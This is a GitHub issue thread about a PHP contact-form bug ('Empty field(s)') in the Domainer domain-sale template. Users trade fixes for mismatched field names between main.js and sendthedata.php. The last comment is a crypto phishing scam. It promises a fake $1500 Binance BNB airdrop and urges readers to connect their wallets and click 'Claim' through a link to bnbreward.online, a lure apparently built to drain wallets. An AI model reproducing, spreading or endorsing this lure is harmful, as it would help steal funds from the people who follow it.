### ISSUE TITLE
Sorry, but there were error(s) found with the form you submitted: Error: Empty field(s) | 

### ISSUE THREAD

**Issue by GHAlan** [pixonte/Domainer#1]
Hi, I am sure I am doing something wrong but I get this error when testing the form on my server. I have tried changing the index page to index,php and leaving as it is. I have added my email address to the sendthedata.php file as well.  What am i doing wrong.  The script and template is here blacksmithsarms.co.uk

**Comment by pixonte** [comment]
​There is an error in field names ( name="f_..." )
names must be:
name - instead of f_name
email - instead of f_email
msg - inst. of f_offer
subscribe - inst. of f_subscribe

hope that'll help
​
ᐧ

**Comment by GHAlan** [comment]
Hi pozh,  I changed all these and same thing is happening.  Thanks for getting back to me so quickly

**Comment by pixonte** [comment]
try to remove line 56
...!empty( $_POST['addr....
from sendthedata.php and retry

**Comment by GHAlan** [comment]
Did this - not worked sorry.  I need to go to work now so i will catch up with you later, thanks for helping.  Al

**Comment by GHAlan** [comment]
hi did you manage to have another look at this for me? Al

**Comment by pixonte** [comment]
not yet, will try to catch the error tomorrow.

**Comment by GHAlan** [comment]
ok thanks

**Comment by GHAlan** [comment]
Morning

**Comment by GHAlan** [comment]
Hi,  are you able to help with the errors i am getting with your domainer? If you are too busy to help sort out the errors this has then let me know so i don't waste more time on this please.

**Comment by pixonte** [comment]
Don't waste please, I'll fix the bug once I have time.

10:11 AM, пт, 01.05.2015, GHAlan notifications@github.com:

**Comment by ourwebdesigner** [comment]
Ok thanks, i can uninstall this now as it is not ready for production, would have liked to give it a try but no problems.  Just so others know:  it has errors and would need the help of the owner of this to put right, the documentation does not show changes that need to be made to make this work. Thanks for your time already.

**Comment by spidirs** [comment]
Still not fixed as of March 2016.

**Comment by dvannoni** [comment]
In case anyone is interested, I figured out what the bug was with this code.  There was a conflict with some of the naming between the JS and the sendthedata.  Way I fixed it.  Go into js/main.js.  In line 39, the Var theData line, and toward the end where it currently says offer: f_offer  change to msg: f_offer.  Everything works great for me now.

**Comment by eworldz** [comment]
Hello,
I am having the same problem with the empty field error and none of the above solutions are working. Thank for your support. My test site is www.kaucoffee.org/TEST/

**Comment by nenukonta** [comment]
Hi @dvannoni , I am still facing the problem, I tired all that were mentioned here but still same. Please check the error message on www.yadadripolice.com

Please help.
Thank you!

**Comment by laycomp** [comment]
Hello Dvannomi,
It's an old thread but Thank you, that bug you found resolved the issue! Your time is appreciated.

**Comment by shafwansyah** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @
